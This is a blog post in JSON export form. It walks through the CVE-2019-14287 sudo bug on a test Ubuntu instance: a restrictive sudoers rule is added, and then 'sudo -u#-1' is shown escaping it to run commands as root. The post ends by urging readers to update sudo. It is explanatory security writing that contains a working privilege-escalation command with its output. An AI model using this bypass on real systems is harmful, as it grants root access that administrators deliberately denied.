{"id":287,"date":"2019-10-20T11:50:01","date_gmt":"2019-10-20T11:50:01","guid":{"rendered":"http:\/\/www.linuxsystems.ovh\/?p=287"},"modified":"2024-04-03T09:17:44","modified_gmt":"2024-04-03T09:17:44","slug":"cve-2019-14287-podatnosc-sudo","status":"publish","type":"post","link":"https:\/\/www.linuxsystems.ovh\/?p=287","title":{"rendered":"CVE 2019-14287 sudo vulnerability"},"content":{"rendered":"\n<p>Today I want to describe a sudo vulnerability.<\/p>\n\n\n\n<!--more-->\n\n\n\n<p>For this purpose I launched a test instance on AWS running Ubuntu Server 14.04 LTS (HVM). It has an older version of sudo:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ sudo --version\nSudo version 1.8.9p5\nSudoers policy plugin version 1.8.9p5\nSudoers file grammar version 43\nSudoers I\/O plugin version 1.8.9p5<\/code><\/pre>\n\n\n\n<p>That is, a vulnerable one \ud83d\ude42<\/p>\n\n\n\n<p>Now we create a user (I named it <strong>test<\/strong>):<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ sudo adduser test\nAdding user `test' ...\nAdding new group `test' (1001) ...\nAdding new user `test' (1001) with group `test' ...\nCreating home directory `\/home\/test' ...\nCopying files from `\/etc\/skel' ...\nEnter new UNIX password: \nRetype new UNIX password: \npasswd: password updated successfully\nChanging the user information for test\nEnter the new value, or press ENTER for the default\n\tFull Name &#91;]: \n\tRoom Number &#91;]: \n\tWork Phone &#91;]: \n\tHome Phone &#91;]: \n\tOther &#91;]: \nIs the information correct? 
&#91;Y\/n] <\/code><\/pre>\n\n\n\n<p>and in the \/etc\/sudoers file I added the line:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>test    ALL=(ALL, !root) \/usr\/bin\/id<\/code><\/pre>\n\n\n\n<p>below the line:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>root\tALL=(ALL:ALL) ALL<\/code><\/pre>\n\n\n\n<p>I switch to the user test with the command:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>su - test<\/code><\/pre>\n\n\n\n<p>And I try to run the command sudo id:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ sudo \/usr\/bin\/id \n&#91;sudo] password for test: \nSorry, user test is not allowed to execute '\/usr\/bin\/id' as root on ip-172-31-41-236.eu-central-1.compute.internal.<\/code><\/pre>\n\n\n\n<p>Of course it does not allow me to, so I try:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ sudo -u#-1 \/usr\/bin\/id \n&#91;sudo] password for test: \nuid=0(root) gid=0(root) groups=0(root)<\/code><\/pre>\n\n\n\n<p>and suddenly it worked \ud83d\ude42 -&gt; we managed to run the id command as root, even though we do not actually have permission to do so&#8230; So on a server where we have sudo, there is a vulnerability that lets someone edit a file that is not theirs by running, for example, the vim command \ud83d\ude42 . 
This has already been fixed in newer versions of sudo, so I encourage you to update your servers.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Today I want to describe a sudo vulnerability.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-287","post","type-post","status-publish","format-standard","hentry","category-bezpieczenstwo-internetowe"],"_links":{"self":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts\/287","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=287"}],"version-history":[{"count":5,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts\/287\/revisions"}],"predecessor-version":[{"id":507,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts\/287\/revisions\/507"}],"wp:attachment":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=287"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=287"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=287"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}